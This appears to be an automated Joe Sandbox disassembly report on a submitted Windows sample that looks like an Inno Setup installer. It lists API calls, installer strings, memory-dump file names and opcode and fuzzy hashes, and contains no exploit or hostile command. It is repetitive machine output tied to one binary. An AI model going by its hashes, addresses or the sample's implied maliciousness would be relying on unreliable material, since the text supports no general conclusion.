                                                                                        • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                        • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                        • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                          • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                          • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                          • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                          • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                        • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                        • API String ID: 854858120-615399546
                                                                                        • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                        • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                        APIs
                                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                        • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                        • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                                        • String ID: 2$MAINICON
                                                                                        • API String ID: 3935243913-3181700818
                                                                                        • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                        • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                        • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                        • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                          • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                          • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                          • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                          • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                          • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                          • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                          • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                          • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                          • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                          • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                        • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                        • API String ID: 316262546-2767913252
                                                                                        • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                        • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                        • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                        • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$Prop
                                                                                        • String ID:
                                                                                        • API String ID: 3887896539-0
                                                                                        • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                        • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                        • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                        • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                        Strings
                                                                                        • PendingFileRenameOperations2, xrefs: 00455784
                                                                                        • PendingFileRenameOperations, xrefs: 00455754
                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                        • WININIT.INI, xrefs: 004557E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                        • API String ID: 47109696-2199428270
                                                                                        • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                        • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                        • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                        • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                        • API String ID: 1375471231-2952887711
                                                                                        • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                        • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                        • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                        • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                        APIs
                                                                                        • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                        • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                        • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnumLongWindows
                                                                                        • String ID: \AB
                                                                                        • API String ID: 4191631535-3948367934
                                                                                        • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                        • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                        • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                        • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                        APIs
                                                                                        • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDeleteHandleModuleProc
                                                                                        • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                        • API String ID: 588496660-1846899949
                                                                                        • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                        • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                        • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                        • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                        Strings
                                                                                        • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                        • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                        • NextButtonClick, xrefs: 0046BC4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                        • API String ID: 0-2329492092
                                                                                        • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                        • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                        • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                        • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                        • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveChangeNotifyWindow
                                                                                        • String ID: $Need to restart Windows? %s
                                                                                        • API String ID: 1160245247-4200181552
                                                                                        • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                        • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                        • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                        • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                        • String ID: Creating directory: %s
                                                                                        • API String ID: 2451617938-483064649
                                                                                        • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                        • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                        • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                        • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharMultiProcWide
                                                                                        • String ID: SfcIsFileProtected$sfc.dll
                                                                                        • API String ID: 2508298434-591603554
                                                                                        • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                        • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                        • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                        • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                        APIs
                                                                                        • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                        • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                        • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: D41500D41520D41540
                                                                                        • String ID: %E
                                                                                        • API String ID: 2153611984-175436132
                                                                                        • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                        • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                        • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                        • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0044B401
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
